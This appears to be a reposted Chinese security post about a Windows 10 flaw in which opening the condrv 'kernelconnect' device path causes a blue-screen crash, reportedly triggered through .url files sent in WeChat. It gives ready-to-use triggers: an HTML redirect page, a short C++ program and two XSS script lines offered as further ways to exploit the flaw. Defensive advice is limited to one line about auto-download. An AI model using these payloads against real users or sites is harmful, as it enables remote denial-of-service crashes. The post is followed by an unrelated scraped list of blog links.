样本

核心代码为:file:///globalroot/device/condrv/kernelconnect

受灾画面:

分析:

.url文件

url格式的文件是一种网页文件,只要接触就会触发访问

漏洞分析见之前发的文章:

Windows10使用浏览器崩溃复现及分析

防护方法:

仅对windows10系统有效,其它系统不受影响

windows微信用户可关闭自动下载

更多方式(.html .exe):

<html><head></head><body>><script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script></body></html>

// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。// #include <iostream>#include <Windows.h> int main(){    WCHAR fileName[] = L"\\\\.\\globalroot\\device\\condrv\\kernelconnect";    WIN32_FILE_ATTRIBUTE_DATA data;    GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);}

吾爱破解大牛分析:

https://www.52pojie.cn/thread-1354077-1-1.html

其他利用方式XSS漏洞:

<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>
<script>document.location = 'file://./globalroot/device/condrv/kernelconnect';</script>

请做好个人防护!谨防漏洞威胁!转载请标注来自开普勒安全团队!谢谢!

转载自https://mp.weixin.qq.com/s/U66SldUJhqtV51WPxQMeCg

红色警戒!Windows微信蓝屏文件刨析!相关推荐

  1. 解决windows电脑蓝屏的方法

    解决90%Windows电脑蓝屏的方法 夜半随风听雨14小时前电脑蓝屏代码大全及解决办法合集代码 含意0 0x00000000 作业完成.1 0x00000001 不正确的函数.2 0x0000000 ...

  2. Windows 7 蓝屏代码大全 amp; 蓝屏全攻略

    关于Windows 7.Vista等系统的蓝屏.之前软媒在Win7之家和Vista之家都有非常多文章讨论过,可是都是筛选的常见的一些问题,今天这个文章是个大全.希望大家看着别头痛.文章收藏下来以后待查 ...

  3. Windows系统蓝屏代码分析

    注:转自网络,拿出来和大家分享. 症状描述: 当您在运行 Microsoft Windows 2000/XP/Server 2003 . Microsoft Windows Vista/Server ...

  4. Windows 11 蓝屏 Stop code - SYSTEM SERVICE EXCEPTION What failed - igdkmd64.sys

    C:\Windows\LiveKernelReports\WATCHDOG PoW32kWatchdog-20221220-0928.dmp Windows 11 蓝屏时,操作系统会生成一个名为 mi ...

  5. windows操作系统蓝屏错误对照表五

    windows操作系统蓝屏错误对照表五 微软办公软件国际认证考试网 鲤鱼小编 更新时间:2014-08-20 http://www.iliyu.com/mos/jingyan/beikao/16038 ...

  6. Windows 7 蓝屏代码大全 蓝屏全攻略

    关于Windows 7.Vista等系统的蓝屏,之前都有很多文章讨论过,但是都是筛选的常见的一些问题,今天这个文章是个大全,希望大家看着别头痛,文章收藏下来以后待查即可. 一.蓝屏含义 1.故障检查信 ...

  7. Windows经常蓝屏 启动速度慢 经常死机 +常用dos命令(win10、win11适用)

    Windows经常蓝屏 启动速度慢 经常死机 +常用dos命令(win10.win11适用) Windows下常用的Dos命令 文件操作 目录切换:cd 切换到别的盘 (比如D盘) d: 查看当前目录 ...

  8. W ndows7蓝屏0x00000024,Windows 7 蓝屏代码大全 蓝屏全攻略

    该楼层疑似违规已被系统折叠 隐藏此楼查看此楼 三.Windows 7蓝屏代码含义 0 0x0000 作业完成. 1 0x0001 不正确的函数. 2 0x0002 系统找不到指定的档案. 3 0x00 ...

  9. 服务器缺少storportSYS文件,Windows操作系统蓝屏日志分析方法

    或许你可以先检测下机器硬件健康状况,详情点击查看检测教程 工具:X64 Debuggers And Tools-x64_en-us 下载地址:链接:http://pan.baidu.com/s/1cA ...

最新文章

  1. ifs 报表开发手册_房地产开发资质要求《暂定资质证书》相关规定
  2. Py之gpxpy:gpxpy的简介、安装、使用方法之详细攻略
  3. C# 约瑟夫环 用数组实现
  4. 浅谈.Net异步编程的前世今生----TPL篇
  5. 猪肉上的红章和蓝章有啥不同?| 今日趣图
  6. python基础整理——ASCII码、Unicode、utf-8、gbk
  7. 人行征信报告(下)——探秘二代征信的内容
  8. Web前端开发前景怎么样?现在学习还来得及吗?
  9. BI(商务智能)是对商业数据进行价值提取的过程
  10. 在vb中实现真正锁定的带自定义菜单的文本控件
  11. python char 相等_用 Python 实现 Excel文本函数
  12. ZR提高失恋测2(9.7)
  13. 【单片机基础篇】51单片机流水灯
  14. Zynga达成收购手机游戏开发商StarLark的协议,后者是热门游戏《Golf Rival》的开发团队
  15. 技术经理成长复盘-激励
  16. Android Proximity Sensor近距离传感器P-Sensor
  17. 计算机屏幕出现条纹w7,电脑屏幕出现条纹,教您电脑屏幕出现条纹闪烁怎么解决...
  18. 锁定计算机耗电吗,我想知道电脑在待机情况下费电吗?
  19. zabbix6.0安装成功路上的小插曲
  20. 谨以此文提醒一下自己这几天又犯怠惰的毛病了,还要继续加油

热门文章

  1. forEach如何遍历和删除自身
  2. 【音视频开发之起始】
  3. Unity实现3D书写功能
  4. 收银系统源码收银系统OEM定制开发(POS+云端+聚合支付+灰度)
  5. c++成长之路(04)
  6. 【漏洞分析】关于 OLE 漏洞的简单总结
  7. 产品设计交付一体化软件,在线设计更便捷
  8. 太有才了!街头创意涂鸦手绘图片欣赏【上篇】
  9. 学习笔记——异地多活
  10. 第一章:初识数据库(3):数据库的语言分类